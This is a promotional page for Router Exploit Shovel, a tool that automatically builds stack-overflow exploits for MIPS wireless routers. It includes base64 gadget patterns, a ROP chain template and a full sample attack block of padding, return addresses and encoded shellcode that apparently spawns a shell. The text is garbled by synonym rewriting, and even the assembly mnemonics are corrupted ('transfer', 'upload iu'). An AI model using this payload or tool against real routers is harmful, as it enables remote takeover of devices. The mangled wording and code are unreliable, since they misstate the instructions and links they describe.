Router Exploit Shovel – Automated Application Generation For Stack Overflow Types On Wireless Routers

Automated Application Generation for Stack Overflow Types on Wireless Routers
Router exploits shovel is an automatic application technology instrument for stack overflow sorts on wi-fi routers. The instrument implements the important thing purposes of exploits, it might adapt to the duration of the knowledge padding at the stack, generate the ROP chain, generate the encoded shellcode, and in any case collect them into a whole assault code. The person most effective wishes to glue the assault code to the overflow location of the POC to finish the Exploit of the far off code execution.
The instrument helps MIPSel and MIPSeb.Run on Ubuntu 16.04 64bit.
exploitation process. Use regex matching to search out to be had devices to refill chain strings. Base64 encoding is to keep away from replica personality escapes. For instance:

chainString: (gadget2)(gadget1)BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB(sleep)CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC(call_code)DDDD(stack_gadget)x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44
gadget1: KC4qKW1vdmUgXCR0OVwsIFwkczE7IGx3IFwkcmFcLCAweDI0XChcJHNwXCk7IGx3IFwkczFcLCAweDIwXChcJHNwXCk7IGx3IFwkczBcLCAweDFjXChcJHNwXCk7KC4qKTsganIgXCR0OTsgYWRkaXUgXCRzcFwsIFwkc3BcLCAweDI4Ow==
#gadget1: (.*)transfer $t9, $s1; lw $ra, 0x24($sp); lw $s1, 0x20($sp); lw $s0, 0x1c($sp);(.*); jr $t9; upload iu $sp, $sp, 0x28;
gadget2: KC4qKWFkZGl1IFwkYTBcLCBcJHplcm9cLCAxOyBtb3ZlIFwkdDlcLCBcJHMxOyBqYWxyIFwkdDk7
#gadget2: (.*)addiu $a0, $0, 1; transfer $t9, $s1; jalr $t9;
call_code: KC4qKW1vdmUgXCR0OVwsIFwkczI7IGphbHIgXCR0OTs=
#call_code: (.*)transfer $t9, $s2; jalr $t9;
stack_gadget: KC4qKWFkZGl1IFwkczJcLCBcJHNwXCwgMHgxODsoLiopbW92ZSBcJHQ5XCwgXCRzMDsgamFsciBcJHQ5Ow==
#stack_gadget: (.*)addiu $s2, $sp, 0x18;(.*)transfer $t9, $s0; jalr $t9;

Attackblocks
You can get attackblocks generated in outcomes/attackBlocks.txt. Such as:

attackBlock = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAx2axb3x7cx60x2axb2xbdxfcBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBx2axb3x5cxa0CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCx2axb0x09x38DDDDx2axafx76x68x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x22x51x44x44x3cx11x99x99x36x31x99x99x27xb2x05x4bx22x52xfcxa0x8ex4axfexf9x02x2ax18x26xaex43xfexf9x8ex4axffx4   1x02x2ax18x26xaex43xffx41x8ex4axffx5dx02x2ax18x26xaex43xffx5dx8ex4axffx71x02x2ax18x26xaex43xffx71x8ex4axffx8dx02x2ax18x26xaex43xffx8dx8ex4axffx99x02x2ax18x26xaex43xffx99x8ex4axffxa5x02x2ax18x26xaex43xffxa5x8ex4axffxadx02x2ax18x26xaex43xffxadx8ex4axffxb9x02x2ax18x26xaex43xffxb9x8ex4axffxc1x02x2ax18x26xaex43xffxc1x24x12xffxffx24x02x10x46x24x0fx03x08x21xefxfcxfcxafxafxfbxfexafxafxfbxfax27xa4xfbxfax01x01x01x0cx21x8cx11x5cx27xbdxffxe0x24x0exffxfdx98x59xb9xbex01xc0x28x27x28x06xffxffx24x02x10x57x01x01x01x0cx23x39x44x44x30x50xffxffx24x0exffxefx01xc0x70x27x24x0dx7ax69x24x0fxfdxffx01xe0x78x27x01xcfx78x04x01xafx68x25xafxadxffxe0xafxa0xffxe4xafxa0xffxe8xafxa0xffxecx9bx89xb9xbcx24x0exffxefx01xc0x30x27x23xa5xffxe0x24x02x10x49x01x01x01x0cx24x0fx73x50x9b   x89xb9xbcx24x05x01x01x24x02x10x4ex01x01x01x0cx24x0fx73x50x9bx89xb9xbcx28x05xffxffx28x06xffxffx24x02x10x48x01x01x01x0cx24x0fx73x50x30x50xffxffx9bx89xb9xbcx24x0fxffxfdx01xe0x28x27xbdx9bx96x46x01x01x01x0cx24x0fx73x50x9bx89xb9xbcx28x05x01x01xbdx9bx96x46x01x01x01x0cx24x0fx73x50x9bx89xb9xbcx28x05xffxffxbdx9bx96x46x01x01x01x0cx3cx0fx2fx2fx35xefx62x69xafxafxffxecx3cx0ex6ex2fx35xcex73x68xafxaexffxf0xafxa0xffxf4x27xa4xffxecxafxa4xffxf8xafxa0xffxfcx27xa5xffxf8x24x02x0fxabx01x01x01x0cx24x02x10x46x24x0fx03x68x21xefxfcxfcxafxafxfbxfexafxafxfbxfax27xa4xfbxfex01x01x01x0cx21x8cx11x5c"

Dependencies

  • Ropper:An superior instrument for dumping binary informations and producing ROP chains.https://github.com/sashs/Ropper
  • filebytes:Library to learn and edit information in ELF、PE、MachO and OAT.https://scoding.de/filebytes-introduction
  • yaml:YAML Ain’t Markup Language.https://yaml.org/
  • optparse:Parser for command line choices.https://doctors.python.org/3/library/optparse.html
  • Capstone:disassembly framework.http://www.capstone-engine.org/
  • re:regex module.
Download Router-Exploit-Shovel